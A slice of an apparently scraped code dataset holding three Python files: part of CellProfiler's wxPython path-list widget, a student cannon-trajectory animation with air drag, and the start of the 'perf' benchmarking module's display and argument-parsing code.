paths.append(item.get_full_path(idx))\n        return paths\n\n    def has_selections(self):\n        \"\"\"Return True if there are any selected items\"\"\"\n        return len(self.selections) > 0\n\n    def clear_selections(self):\n        self.selections = set()\n        self.schmutzy = True\n        self.notify_selection_changed()\n        self.Refresh(eraseBackground=False)\n\n    def SelectAll(self):\n        \"\"\"Select all items in the control\"\"\"\n        self.selections = set(range(len(self)))\n        self.schmutzy = True\n        self.notify_selection_changed()\n        self.Refresh(eraseBackground=False)\n\n    def select_path(self, url):\n        \"\"\"Select the given URL if it is present in the list\n\n        url - url to select if it is present\n\n        returns True if the URL was selected\n        \"\"\"\n        folder, filename = self.splitpath(url)\n        idx = bisect.bisect_left(self.folder_names, folder)\n        if idx < len(self.folder_names) and self.folder_names[idx] == folder:\n            folder_item = self.folder_items[idx]\n        else:\n            return False\n        fp = folder_item.filenames\n        pidx = bisect.bisect_left(fp, filename)\n        if pidx >= len(fp) or fp[pidx] != filename:\n            return False\n        self.selections.add(self.folder_idxs[idx] + pidx + 1)\n        self.notify_selection_changed()\n        return True\n\n    def notify_selection_changed(self):\n        \"\"\"Publish a WX event that tells the world that the selection changed\"\"\"\n        event = wx.NotifyEvent(EVT_PLC_SELECTION_CHANGED.evtType[0])\n        event.EventObject = self\n        self.GetEventHandler().ProcessEvent(event)\n\n    def has_focus_item(self):\n        \"\"\"Return True if an item is focused\"\"\"\n
        return self.focus_item is not None\n\n    def get_folder(self, path, flags=0):\n        \"\"\"Return the files or folders in the current folder.\n\n        path - path to the folder\n        flags - FLAG_ENABLED_ONLY to only return enabled files or folders\n                with enabled files. FLAG_FOLDERS to return folders instead\n                of files. FLAG_RECURSE to do all subfolders.\n        \"\"\"\n        idx = bisect.bisect_left(self.folder_names, path)\n        folders = []\n        recurse = (flags & self.FLAG_RECURSE) != 0\n        wants_folders = (flags & self.FLAG_FOLDERS) != 0\n        enabled_only = (flags & self.FLAG_ENABLED_ONLY) != 0\n        has_path = (0 <= idx < len(self.folder_names) and path == self.folder_names[idx])\n        if has_path:\n            if not wants_folders:\n                folders.append(self.folder_items[idx])\n            idx += 1\n        if recurse or wants_folders:\n            for idx in range(idx, len(self.folder_items)):\n                if not self.folder_names[idx].startswith(path):\n                    break\n                rest = self.folder_names[idx][len(path):]  # fixed: slice the remainder, not a single character\n                if rest[0] != \"/\":\n                    continue\n                rest = rest[1:]\n                if (not recurse) and \"/\" in rest:\n                    continue\n                folders.append(self.folder_items[idx])\n        if wants_folders:\n            return [x.folder_name for x in folders]\n        else:\n            result = []\n            for item in folders:\n                if enabled_only:\n                    result += [\n                        item.folder_name + \"/\" + item.filenames[e]\n                        for e in item.enabled_idxs]\n                else:\n                    result += [item.folder_name + \"/\" + f\n                               for f in item.filenames]\n            return result\n\n    def on_scroll_changed(self, event):\n        #\n        # WX is buggy in the way it honors ScrolledWindow.EnableScrolling.\n        # The arrow keys scroll the bitmap and the top line is scrolled down.\n        #\n        assert isinstance(event, wx.ScrollWinEvent)\n        if event.GetOrientation() == wx.VERTICAL:\n            width, _ = self.GetSizeTuple()\n            r = wx.Rect(0, 0, width, (self.line_height + self.leading) * 2)\n            self.Refresh(eraseBackground=False, rect=r)\n        event.Skip(True)\n\n    def on_set_focus(self, event):\n        self.Refresh(eraseBackground=False)\n        event.Skip(True)\n\n    def on_kill_focus(self, event):\n        self.Refresh(eraseBackground=False)\n        event.Skip(True)\n\n    DROP_FILES_AND_FOLDERS_HERE = \"Drop files and folders here\"\n    __DROP_FILES_AND_FOLDERS_FONT = None\n\n    @property\n    def DROP_FILES_AND_FOLDERS_FONT(self):\n        if self.__DROP_FILES_AND_FOLDERS_FONT is None:\n            self.__DROP_FILES_AND_FOLDERS_FONT = wx.Font(\n                36, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL,\n                wx.FONTWEIGHT_BOLD)\n        return self.__DROP_FILES_AND_FOLDERS_FONT\n\n    def show_idx_as_selected(self, idx):\n        \"\"\"Return True if the indexed line should be shown selected\"\"\"\n        if idx in self.selections:\n            return True\n        if self.mouse_down_idx is None:\n            return False\n        sel_start = min(self.mouse_down_idx, self.mouse_idx)\n        sel_end = max(self.mouse_down_idx, self.mouse_idx) + 1\n        return sel_start <= idx < sel_end\n\n    def on_paint(self, event):\n        \"\"\"Handle the paint event\"\"\"\n        assert isinstance(event, wx.PaintEvent)\n        paint_dc = wx.BufferedPaintDC(self)\n        if self.schmutzy:\n            self.recalc()\n        width, height = self.GetSizeTuple()\n        rn = wx.RendererNative.Get()\n        paint_dc.BeginDrawing()\n        background_color = wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOW)\n        background_brush = wx.Brush(background_color)\n        paint_dc.SetBrush(background_brush)\n        paint_dc.Clear()\n        paint_dc.SetFont(self.Font)\n        paint_dc.SetBackgroundMode(wx.TRANSPARENT)\n        has_focus = self.FindFocus() == self\n        if has_focus:\n            dir_color = wx.SystemSettings.GetColour(wx.SYS_COLOUR_HOTLIGHT)\n        else:\n            dir_color = wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT)\n\n        enabled_color = wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT)\n        disabled_color = 
wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT)\n if len(self) == 0:\n text = self.DROP_FILES_AND_FOLDERS_HERE\n font = self.DROP_FILES_AND_FOLDERS_FONT\n paint_dc.SetTextForeground(wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT))\n paint_dc.SetFont(font)\n text_width, text_height = paint_dc.GetTextExtent(text)\n paint_dc.DrawText(text,\n (width - text_width) / 2,\n (height - text_height) / 2)\n paint_dc.SetFont(self.Font)\n\n selected_text = wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHTTEXT)\n try:\n x = self.GetScrollPos(wx.SB_HORIZONTAL)\n y = self.GetScrollPos(wx.SB_VERTICAL)\n line_height = self.line_height + self.leading\n yline = min(y, len(self))\n yline_max = min(yline + (height + line_height - 1) / line_height,\n len(self))\n sel_width = 0\n #\n # Precompute the width of the selection rectangle\n #\n for idx in range(yline + 1, yline_max):\n item, pidx = self[idx]\n if item is None:\n break\n if pidx is None:\n continue\n if self.show_idx_as_selected(idx) or self.focus_item == idx:\n item_width = paint_dc.GetTextExtent(\n item.file_display_names[pidx])[0]\n sel_width = max(sel_width, item_width)\n\n #\n # Paint the strings\n #\n for idx in range(yline, yline_max):\n yy = (idx - yline) * line_height\n item, pidx = self[idx]\n if item is None:\n break\n if pidx is None or idx == yline:\n # A directory\n paint_dc.SetTextForeground(dir_color)\n rTreeItem = wx.Rect(\n -x, yy, self.TREEITEM_WIDTH, self.TREEITEM_HEIGHT)\n rn.DrawTreeItemButton(\n self, paint_dc, rTreeItem,\n wx.CONTROL_EXPANDED if item.opened else 0)\n paint_dc.DrawText(\n item.folder_display_name,\n self.TREEITEM_WIDTH + self.TREEITEM_GAP - x, yy)\n else:\n # A file\n selected = self.show_idx_as_selected(idx)\n flags = wx.CONTROL_FOCUSED if has_focus else 0\n if selected:\n flags += wx.CONTROL_SELECTED\n if idx == self.focus_item:\n flags += wx.CONTROL_CURRENT\n cellprofiler.gui.draw_item_selection_rect(\n self, paint_dc,\n wx.Rect(self.TREEITEM_WIDTH - x, yy,\n sel_width + 2 * self.TREEITEM_GAP, line_height),\n flags)\n if selected:\n paint_dc.SetTextForeground(selected_text)\n else:\n paint_dc.SetTextForeground(\n enabled_color if item.enabled[pidx]\n else disabled_color)\n paint_dc.DrawText(\n item.file_display_names[pidx],\n self.TREEITEM_WIDTH + self.TREEITEM_GAP - x, yy)\n finally:\n paint_dc.SetBrush(wx.NullBrush)\n paint_dc.SetFont(wx.NullFont)\n background_brush.Destroy()\n paint_dc.EndDrawing()\n paint_dc.Destroy()\n\n def refresh_item(self, idx):\n \"\"\"Signal the window to repaint the given item\n\n idx - index of the item.\n \"\"\"\n total_height = (self.line_height + self.leading)\n y = (idx - self.GetScrollPos(wx.SB_VERTICAL)) * total_height\n width, _ = self.GetSizeTuple()\n self.Refresh(eraseBackground=False,\n rect=wx.Rect(0, y, width, total_height))\n\n def get_mouse_idx(self, event):\n \"\"\"Return the line index at the event's mouse coordinate\"\"\"\n if len(self.folder_items) == 0:\n return -1\n x, y = event.GetPositionTuple()\n line_height = self.line_height + self.leading\n idx = int(y / line_height) + self.GetScrollPos(wx.SB_VERTICAL)\n idx = max(0, min(len(self) - 1, idx))\n if y < line_height:\n # It's the slightly bogus directory at the top\n self.recalc()\n folder_idx = bisect.bisect_right(self.folder_idxs, idx) - 1\n if folder_idx == -1:\n return -1\n idx = self.folder_idxs[folder_idx]\n return idx\n\n @staticmethod\n def get_treeitem_x():\n \"\"\"Return the width of the treeitem graphic\n\n returns wx.SYS_SMALLICON_X if defined on the platform\n or 16 for the Mac.\n 
\"\"\"\n treeitem_x = wx.SystemSettings.GetMetric(wx.SYS_SMALLICON_X)\n if treeitem_x < 0:\n # wx.SYS_SMALLICON_X not defined for this platform\n # (which means Mac)\n return 16\n return treeitem_x\n\n def on_mouse_down(self, event):\n \"\"\"Handle left mouse button down\"\"\"\n assert isinstance(event, wx.MouseEvent)\n self.SetFocus()\n idx = self.get_mouse_idx(event)\n if len(self.folder_items) == 0:\n return\n item, path_idx = self[idx]\n if item is None:\n item = self.folder_items[-1]\n path_idx = len(item.filenames)\n\n treeitem_x = self.get_treeitem_x()\n\n if path_idx is None and event.GetX() < treeitem_x:\n needs_selchange_evt = len(self.selections) > 0\n self.selections = set()\n item.opened = not item.opened\n self.schmutzy = True\n if needs_selchange_evt:\n self.notify_selection_changed()\n self.Refresh(eraseBackground=False)\n return\n\n if event.ShiftDown() and len(self.selections) == 1:\n self.mouse_down_idx = self.selections.pop()\n else:\n self.mouse_down_idx = idx\n if not event.ControlDown():\n self.selections = set()\n self.mouse_idx = idx\n self.focus_item = idx\n self.CaptureMouse()\n self.Refresh(eraseBackground=False)\n\n def on_double_click(self, event):\n \"\"\"Handle double click event\"\"\"\n idx = self.get_mouse_idx(event)\n if idx == -1:\n self.fn_do_menu_command([], None)\n return\n item, path_idx = self[idx]\n if item is None:\n self.fn_do_menu_command([], None)\n return\n treeitem_x = self.get_treeitem_x()\n if path_idx is None:\n if event.GetX() < treeitem_x:\n # Handle second click on tree expand/contract as\n # if the user clicked slowly\n #\n self.selections = set()\n item.opened = not item.opened\n self.schmutzy = True\n self.notify_selection_changed()\n self.Refresh(eraseBackground=False)\n return\n if self.fn_do_menu_command is not None:\n self.fn_do_menu_command([item.get_full_path(path_idx)], None)\n\n def on_right_mouse_down(self, event):\n \"\"\"Handle right mouse button down\"\"\"\n assert isinstance(event, wx.MouseEvent)\n self.SetFocus()\n idx = self.get_mouse_idx(event)\n if idx == -1 or len(self.folder_items) == 0:\n event.Skip(True)\n return\n\n self.focus_item = idx\n if self[idx][1] is not None:\n self.selections.add(idx)\n self.notify_selection_changed()\n self.refresh_item(idx)\n event.Skip(True)\n\n def on_mouse_moved(self, event):\n \"\"\"Handle mouse movement during capture\"\"\"\n if self.mouse_down_idx is None:\n return\n self.mouse_idx = self.get_mouse_idx(event)\n self.focus_item = self.mouse_idx\n self.scroll_into_view()\n self.Refresh(eraseBackground=False)\n\n def scroll_into_view(self):\n \"\"\"Scroll the focus item into view\"\"\"\n idx_min = self.GetScrollPos(wx.SB_VERTICAL)\n current_x = self.GetScrollPos(wx.SB_HORIZONTAL)\n _, height = self.GetSizeTuple()\n height = int(height / (self.line_height + self.leading))\n idx_max = idx_min + height\n if self.focus_item <= idx_min:\n self.Scroll(current_x, self.focus_item - 1)\n self.refresh_item(self.focus_item)\n self.refresh_item(self.focus_item - 1)\n elif self.focus_item >= idx_max:\n self.Scroll(current_x, self.focus_item - height + 1)\n\n def on_mouse_up(self, event):\n \"\"\"Handle left mouse button up event\"\"\"\n if self.mouse_down_idx is None:\n return\n if self.mouse_down_idx == self.mouse_idx:\n if self.mouse_down_idx in self.selections:\n self.selections.remove(self.mouse_down_idx)\n self.Refresh(eraseBackground=False)\n elif self[self.mouse_down_idx][1] is not None:\n self.selections.add(self.mouse_down_idx)\n else:\n start = min(self.mouse_down_idx, 
self.mouse_idx)\n end = max(self.mouse_down_idx, self.mouse_idx) + 1\n self.selections.update(\n [idx for idx in range(start, end) if self[idx][1] is not None])\n self.mouse_down_idx = None\n self.notify_selection_changed()\n self.ReleaseMouse()\n\n def on_mouse_capture_lost(self, event):\n \"\"\"Handle loss of mouse capture\"\"\"\n self.mouse_down_idx = None\n\n def on_up_down(self, event, direction):\n \"\"\"Handle the up and down arrow keys\n\n Move the current selection up or down.\n\n event - key event\n direction - 1 for down, -1 for up\n \"\"\"\n needs_selchange_event = False\n if (self.focus_item in self.selections and\n not event.ShiftDown()):\n if len(self.selections) > 1:\n self.Refresh(eraseBackground=False)\n self.selections = set()\n needs_selchange_event = True\n self.refresh_item(self.focus_item)\n if (direction + self.focus_item < 0 or\n direction + self.focus_item >= len(self)):\n if needs_selchange_event:\n self.notify_selection_changed()\n return\n self.focus_item += direction\n # There should never be an empty directory, therefore, item # 1\n # should be the only item that has no precedent and we\n # should only have to skip one directory item\n if self[self.focus_item][1] is None:\n self.focus_item += direction\n self.scroll_into_view()\n self.selections.add(self.focus_item)\n self.notify_selection_changed()\n self.refresh_item(self.focus_item)\n\n def on_key_down(self, event):\n \"\"\"Handle a key press\"\"\"\n assert isinstance(event, wx.KeyEvent)\n if event.KeyCode == wx.WXK_DELETE and self.fn_delete is not None:\n paths = self.get_paths(self.FLAG_SELECTED_ONLY)\n self.fn_delete(paths)\n return\n elif (event.KeyCode == wx.WXK_UP and self.focus_item is not None\n and self.focus_item > 1):\n self.on_up_down(event, -1)\n return\n elif (event.KeyCode == wx.WXK_DOWN and self.focus_item is not None\n and self.focus_item < len(self)):\n self.on_up_down(event, 1)\n return\n event.Skip(True)\n\n context_menu_ids = []\n\n def on_context_menu(self, event):\n \"\"\"Handle a context menu request\"\"\"\n if self.focus_item is None:\n fn_context_menu = self.fn_empty_context_menu\n fn_do_menu_command = self.fn_do_empty_context_menu_command\n arg = None\n else:\n item, idx = self[self.focus_item]\n if idx is None:\n fn_context_menu = self.fn_folder_context_menu\n fn_do_menu_command = self.fn_do_folder_menu_command\n arg = item.folder_name\n else:\n fn_context_menu = self.fn_context_menu\n fn_do_menu_command = self.fn_do_menu_command\n arg = self.get_paths(self.FLAG_SELECTED_ONLY)\n\n if fn_context_menu is None or fn_do_menu_command is None:\n return\n pos = event.GetPosition()\n pos = self.ScreenToClient(pos)\n item_list = fn_context_menu(arg)\n if len(self.context_menu_ids) < len(item_list):\n self.context_menu_ids += [\n wx.NewId() for _ in range(len(self.context_menu_ids),\n len(item_list))]\n menu = wx.Menu()\n for idx, (key, display_name) in enumerate(item_list):\n menu.Append(self.context_menu_ids[idx], display_name)\n\n def on_menu(event):\n idx = self.context_menu_ids.index(event.Id)\n fn_do_menu_command(arg, item_list[idx][0])\n\n self.Bind(wx.EVT_MENU, on_menu)\n try:\n self.PopupMenu(menu, pos)\n finally:\n self.Unbind(wx.EVT_MENU, handler=on_menu)\n menu.Destroy()\n","sub_path":"cellprofiler/gui/pathlist.py","file_name":"pathlist.py","file_ext":"py","file_size_in_byte":35662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"485056520","text":"from matplotlib import pyplot as plt \nfrom matplotlib import animation 
\nimport math \n\n#calculate the trajectory\ndef Trajectory(v,theta,B,T0,choice):\n v_x=v * math.cos(theta * math.pi/180)\n v_y=v * math.sin(theta * math.pi/180)\n dt,y0,a,alpha=0.005,10**4,6.5*10**(-3),2.5\n x,y,t=0,0,0\n distance=[[]for i in range(3)]\n distance[0].append(x)\n distance[1].append(y)\n if choice<0: #negative for isothermal approximation\n def rho(height):\n return math.exp(-height/y0)\n else: #non-negative for adiabatic approximation\n def rho(height):\n return (1-a*height/T0)**alpha\n while y>= 0:\n a_x3, a_y3=-B*rho(y)*v*v_x,-9.8-B*rho(y)*v*v_y\n x=x+v_x*dt\n v_x=v_x+a_x3*dt\n y=y+v_y*dt\n v_y=v_y+a_y3*dt\n t=t+dt\n v=(v_x**2+v_y**2)**0.5\n distance[0].append(x/1000) #divided by 1000 to change the unit from \"meter\" to \"kilometer\"\n distance[1].append(y/1000)\n distance[2].append(t)\n return distance\nXMAX=0\nANGLE=0\n# first set up the figure, the axis, and the plot element we want to animate \nfig = plt.figure() \nax = plt.axes(xlim=(0, 35), ylim=(0,18))\nline, = ax.plot([], [], lw=2) \nplt.title('Cannon Trajectory of Isothermal Approximation')\nplt.xlabel('Horizon Distance x(km)')\nplt.ylabel('Vertical Distance y(km)')\nplt.grid(True,color='k')\nnote = ax.text(18,12,'',fontsize=12)\nnote1= ax.text(18,8,'',fontsize=12,color='red')\n# initialization function: plot the background of each frame\ndef init(): \n line.set_data([], []) \n note.set_text('') \n note1.set_text('') \n return line,note,note1\n# animation function. this is called sequentially \ndef animate(j):\n dis=Trajectory(700,j,4*10**(-5),300,-1) \n x = dis[0] \n y = dis[1]\n global XMAX\n global J\n if XMAX < x[-1]:\n XMAX,J=x[-1],j\n line.set_data(x, y) \n note.set_text('initial speed:700m/s \\n'+'firing angle: %d'%j + r'$^{\\circ}$'+ '\\ndistance:%s'%dis[0][-1] + 'km')\n note1.set_text('angle of furthest distance:%d'%J+r'$^{\\circ}$'+'\\nmaximum range:%s'%XMAX + 'km')\n return line,note,note1\n\nanim1=animation.FuncAnimation(fig, animate, init_func=init, frames=90, interval=5)#, blit=True) \nanim1.save('/home/shangguan/computationalphysics_N2013301020076/ex6_ch2.9/try/111.png')#anim1.save('11111.mp4', fps=30, extra_args=['-vcodec', 'libx264'])\nplt.show() \n","sub_path":"Homework5/Homework5-4.py","file_name":"Homework5-4.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"299833936","text":"from __future__ import print_function\nimport argparse\nimport errno\nimport os\nimport subprocess\nimport sys\n\nimport six\nimport statistics # Python 3.4+, or backport on Python 2.7\n\ntry:\n # Optional dependency\n import psutil\nexcept ImportError:\n psutil = None\n\nimport perf.metadata\n\n\ndef _bench_suite_from_subprocess(args):\n proc = subprocess.Popen(args,\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n try:\n if six.PY3:\n with proc:\n stdout, stderr = proc.communicate()\n else:\n stdout, stderr = proc.communicate()\n except:\n try:\n proc.kill()\n except OSError:\n pass\n proc.wait()\n raise\n\n if proc.returncode:\n sys.stdout.write(stdout)\n sys.stdout.flush()\n sys.stderr.write(stderr)\n sys.stderr.flush()\n raise RuntimeError(\"%s failed with exit code %s\"\n % (args[0], proc.returncode))\n\n return perf.BenchmarkSuite.loads(stdout)\n\n\ndef _display_run(bench, run_index, run,\n common_metadata=None, raw=False, verbose=0, file=None):\n loops = run.loops * run.inner_loops\n raw_samples = run._get_raw_samples(warmups=True)\n if not raw:\n samples = [sample / loops for 
sample in raw_samples]\n    else:\n        samples = raw_samples\n\n    samples_str = list(bench._format_samples(samples))\n\n    median = bench.median()\n    max_delta = median * 0.05\n    for index, sample in enumerate(samples):\n        if raw:\n            sample /= loops\n        delta = sample - median\n        if abs(delta) > max_delta:\n            samples_str[index] += ' (%+.0f%%)' % (delta * 100 / median)\n\n    # FIXME: don't use private attribute\n    nwarmup = run._warmups\n    if nwarmup:\n        warmups = samples_str[:nwarmup]\n        samples = samples_str[nwarmup:]\n    else:\n        samples = samples_str\n\n    if raw:\n        name = 'raw samples'\n    else:\n        name = 'samples'\n    text = '%s (%s): %s' % (name, len(samples), ', '.join(samples))\n    if nwarmup and verbose >= 0:\n        if raw:\n            name = 'raw warmup'\n        else:\n            name = 'warmup'\n        text = ('%s (%s): %s; %s'\n                % (name, len(warmups), ', '.join(warmups), text))\n\n    text = \"Run %s: %s\" % (run_index, text)\n    print(text, file=file)\n\n    if verbose > 0:\n        prefix = ' '\n        print(prefix + 'loops: %s' % perf._format_number(run.loops))\n        if run.inner_loops:\n            print(prefix + 'inner_loops: %s'\n                  % perf._format_number(run.inner_loops))\n\n        metadata = run.get_metadata()\n        for key in sorted(metadata):\n            if common_metadata and key in common_metadata:\n                continue\n            value = metadata[key]\n            print('%s%s: %s' % (prefix, key, value))\n\n\ndef _display_runs(bench, quiet=False, verbose=False, raw=False, file=None):\n    runs = bench.get_runs()\n    if quiet:\n        verbose = -1\n    elif verbose:\n        verbose = 1\n    else:\n        verbose = 0\n\n    if verbose > 0:\n        common_metadata = bench._get_common_metadata()\n        print(\"Common metadata:\", file=file)\n        for key in sorted(common_metadata):\n            value = common_metadata[key]\n            print(' %s: %s' % (key, value), file=file)\n        print(file=file)\n    else:\n        common_metadata = None\n\n    for run_index, run in enumerate(runs, 1):\n        _display_run(bench, run_index, run,\n                     common_metadata=common_metadata,\n                     verbose=verbose, raw=raw, file=file)\n\n\ndef _display_stats(bench, file=None):\n    fmt = bench._format_sample\n    samples = bench.get_samples()\n\n    nrun = bench.get_nrun()\n    nsample = len(samples)\n    median = bench.median()\n\n    # Raw sample minimum/maximum\n    raw_samples = bench._get_raw_samples()\n    print(\"Raw sample minimum: %s\" % bench._format_sample(min(raw_samples)),\n          file=file)\n    print(\"Raw sample maximum: %s\" % bench._format_sample(max(raw_samples)),\n          file=file)\n    print(file=file)\n\n    # Number of samples\n    print(\"Number of runs: %s\" % perf._format_number(nrun), file=file)\n    print(\"Total number of samples: %s\" % perf._format_number(nsample),\n          file=file)\n\n    nsample_per_run = bench._get_nsample_per_run()\n    text = perf._format_number(nsample_per_run)\n    if isinstance(nsample_per_run, float):\n        text += ' (average)'\n    print('Number of samples per run: %s' % text, file=file)\n\n    warmups = bench.get_warmups()\n    text = perf._format_number(warmups)\n    if isinstance(warmups, float):\n        text += ' (average)'\n    print('Number of warmups per run: %s' % text, file=file)\n\n    # Loop iterations per sample\n    loops = bench.get_loops()\n    inner_loops = bench.get_inner_loops()\n    total_loops = loops * inner_loops\n    if isinstance(total_loops, int):\n        text = perf._format_number(total_loops)\n    else:\n        text = \"%s (average)\" % total_loops\n\n    if not(isinstance(inner_loops, int) and inner_loops == 1):\n        if isinstance(loops, int):\n            loops = perf._format_number(loops, 'outer-loop')\n        else:\n            loops = '%.1f outer-loops (average)' % loops  # fixed: the '%' interpolation was missing\n\n        if isinstance(inner_loops, int):\n            inner_loops = perf._format_number(inner_loops, 'inner-loop')\n        else:\n            inner_loops = \"%.1f inner-loops 
(average)\" % inner_loops\n\n text = '%s (%s x %s)' % (text, loops, inner_loops)\n\n print(\"Loop iterations per sample: %s\" % text, file=file)\n print(file=file)\n\n # Minimum\n def format_limit(median, value):\n return \"%s (%+.0f%%)\" % (fmt(value), (value - median) * 100 / median)\n\n print(\"Minimum: %s\" % format_limit(median, min(samples)), file=file)\n\n # Median +- std dev\n print(str(bench), file=file)\n\n # Mean +- std dev\n mean = statistics.mean(samples)\n if len(samples) > 2:\n stdev = statistics.stdev(samples, mean)\n print(\"Mean +- std dev: %s +- %s\"\n % bench._format_samples((mean, stdev)),\n file=file)\n else:\n print(\"Mean: %s\" % bench._format_sample(mean), file=file)\n\n # Maximum\n print(\"Maximum: %s\" % format_limit(median, max(samples)), file=file)\n\n\ndef _display_histogram(benchmarks, bins=20, extend=False, file=None):\n import collections\n import shutil\n\n if hasattr(shutil, 'get_terminal_size'):\n columns, lines = shutil.get_terminal_size()\n else:\n columns = 80\n lines = 25\n\n if not bins:\n bins = max(lines - 3, 3)\n if not extend:\n bins = min(bins, 25)\n\n all_samples = []\n for bench, title in benchmarks:\n all_samples.extend(bench.get_samples())\n all_min = min(all_samples)\n all_max = max(all_samples)\n sample_k = float(all_max - all_min) / bins\n if not sample_k:\n sample_k = 1.0\n\n def sample_bucket(value):\n # round towards zero (ROUND_DOWN)\n return int(value / sample_k)\n bucket_min = sample_bucket(all_min)\n bucket_max = sample_bucket(all_max)\n\n for index, item in enumerate(benchmarks):\n bench, title = item\n if title:\n print(\"[ %s ]\" % title, file=file)\n\n samples = bench.get_samples()\n\n buckets = [sample_bucket(value) for value in samples]\n counter = collections.Counter(buckets)\n count_max = max(counter.values())\n count_width = len(str(count_max))\n\n sample_width = max([len(bench._format_sample(bucket * sample_k))\n for bucket in range(bucket_min, bucket_max + 1)])\n width = columns - sample_width\n\n line = ': %s #' % count_max\n width = columns - (sample_width + len(line))\n if not extend:\n width = min(width, 79)\n width = max(width, 3)\n line_k = float(width) / max(counter.values())\n for bucket in range(bucket_min, bucket_max + 1):\n count = counter.get(bucket, 0)\n linelen = int(round(count * line_k))\n text = bench._format_sample(bucket * sample_k)\n line = ('#' * linelen) or '|'\n print(\"{:>{}}: {:>{}} {}\".format(text, sample_width,\n count, count_width, line),\n file=file)\n\n if index != len(benchmarks) - 1:\n print(file=file)\n\n\ndef _warn_if_bench_unstable(bench):\n # FIXME: modify Benchmark constructor to avoid this annoying case?\n if not bench.get_nrun():\n raise ValueError(\"benchmark has no run\")\n\n warnings = []\n warn = warnings.append\n samples = bench.get_samples()\n\n # Display a warning if the standard deviation is larger than 10%\n median = bench.median()\n # Avoid division by zero\n if median and len(samples) > 1:\n k = statistics.stdev(samples) / median\n if k > 0.10:\n if k > 0.20:\n warn(\"ERROR: the benchmark is very unstable, the standard \"\n \"deviation is very high (stdev/median: %.0f%%)!\"\n % (k * 100))\n else:\n warn(\"WARNING: the benchmark seems unstable, the standard \"\n \"deviation is high (stdev/median: %.0f%%)\"\n % (k * 100))\n warn(\"Try to rerun the benchmark with more runs, samples \"\n \"and/or loops\")\n warn(\"\")\n\n # Check that the shortest sample took at least 1 ms\n shortest = min(bench._get_raw_samples())\n text = bench._format_sample(shortest)\n if shortest < 
1e-3:\n        if shortest < 1e-6:\n            warn(\"ERROR: the benchmark may be very unstable, \"\n                 \"the shortest raw sample only took %s\" % text)\n        else:\n            warn(\"WARNING: the benchmark may be unstable, \"\n                 \"the shortest raw sample only took %s\" % text)\n        warn(\"Try to rerun the benchmark with more loops \"\n             \"or increase --min-time\")\n        warn(\"\")\n\n    return warnings\n\n\ndef _display_metadata(metadata, header=\"Metadata:\", file=None):\n    if not metadata:\n        return\n    print(header, file=file)\n    for key, value in sorted(metadata.items()):\n        print(\"- %s: %s\" % (key, value), file=file)\n\n\ndef _display_benchmark(bench, file=None, check_unstable=True, metadata=False,\n                       dump=False, stats=False, hist=False):\n    if dump:\n        _display_runs(bench, file=file)\n        print(file=file)\n\n    if metadata:\n        _display_metadata(bench.get_metadata(), file=file)\n        print(file=file)\n\n    if hist:\n        _display_histogram([(bench, None)], file=file)\n        print(file=file)\n\n    if stats:\n        _display_stats(bench, file=file)\n        print(file=file)\n\n    if check_unstable:\n        warnings = _warn_if_bench_unstable(bench)\n        for line in warnings:\n            print(line, file=file)\n\n    print(str(bench), file=file)\n\n\nclass TextRunner:\n    # Default parameters are chosen to have approximately a run of 0.5 second\n    # and so a total duration of 5 seconds by default\n    def __init__(self, name, samples=3, warmups=1, processes=20,\n                 loops=0, min_time=0.1, max_time=1.0, metadata=None,\n                 inner_loops=1, _argparser=None):\n        if not name:\n            raise ValueError(\"name must be a non-empty string\")\n        self.name = name\n        if metadata is not None:\n            self.metadata = metadata\n        else:\n            self.metadata = {}\n\n        # result of argparser.parse_args()\n        self.args = None\n\n        # callback used to prepare command line arguments to spawn a worker\n        # child process. The callback is called with prepare(runner, args).\n        # args must be modified in-place.\n        self.prepare_subprocess_args = None\n\n        # Command arguments (a list) used to call the program:\n        # (sys.executable, sys.argv[0]) by default. 
For example,\n # \"python3 -m perf.timeit\" sets program_args to\n # (sys.executable, '-m', 'perf.timeit').\n self.program_args = (sys.executable, sys.argv[0])\n\n # Number of inner-loops of the sample_func for bench_sample_func()\n self.inner_loops = inner_loops\n\n def strictly_positive(value):\n value = int(value)\n if value <= 0:\n raise ValueError(\"value must be > 0\")\n return value\n\n def positive_or_nul(value):\n value = int(value)\n if value < 0:\n raise ValueError(\"value must be >= 0\")\n return value\n\n if _argparser is not None:\n parser = _argparser\n else:\n parser = argparse.ArgumentParser()\n parser.description = 'Benchmark'\n parser.add_argument('--rigorous', action=\"store_true\",\n help='Spend longer running tests '\n 'to get more accurate results')\n parser.add_argument('--fast', action=\"store_true\",\n help='Get rough answers quickly')\n parser.add_argument(\"--debug-single-sample\", action=\"store_true\",\n help=\"Debug mode, only collect a single sample\")\n parser.add_argument('-p', '--processes',\n type=strictly_positive, default=processes,\n help='number of processes used to run benchmarks '\n '(default: %s)' % processes)\n parser.add_argument('-n', '--samples', dest=\"samples\",\n type=strictly_positive, default=samples,\n help='number of samples per process (default: %s)'\n % samples)\n parser.add_argument('-w', '--warmups', dest=\"warmups\",\n type=positive_or_nul, default=warmups,\n help='number of skipped samples per run used '\n 'to warmup the benchmark (default: %s)'\n % warmups)\n parser.add_argument('-l', '--loops',\n type=positive_or_nul, default=loops,\n help='number of loops per sample, 0 means '\n 'automatic calibration (default: %s)'\n % loops)\n parser.add_argument('-v', '--verbose', action=\"store_true\",\n help='enable verbose mode')\n parser.add_argument('-q', '--quiet', action=\"store_true\",\n help='enable quiet mode')\n parser.add_argument('--stdout', action='store_true',\n help='write results encoded to JSON into stdout')\n parser.add_argument('--json', metavar='FILENAME',\n help='write results encoded to JSON into FILENAME')\n parser.add_argument('--json-append', metavar='FILENAME',\n help='append results encoded to JSON into FILENAME')\n parser.add_argument('--min-time', type=float, default=min_time,\n help='Minimum duration in seconds of a single '\n 'sample, used to calibrate the number of '\n 'loops (default: %s)'\n % perf._format_timedelta(min_time))\n parser.add_argument('--worker', action=\"store_true\",\n help='worker process, run the benchmark')\n 